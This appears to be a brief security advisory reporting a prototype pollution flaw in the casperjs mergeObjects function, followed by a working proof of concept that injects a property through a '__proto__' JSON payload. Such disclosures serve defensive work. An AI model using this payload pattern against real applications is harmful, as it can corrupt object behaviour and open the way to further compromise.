casperjs is a navigation scripting & testing utility for PhantomJS and SlimerJS.
Affected versions of this package are vulnerable to Prototype Pollution via the mergeObjects utility function.
var payload = JSON.parse('{"__proto__": {"a": "pwned"}}');
mergeObjects({}, payload);
console.log({}.a); // prints "pwned"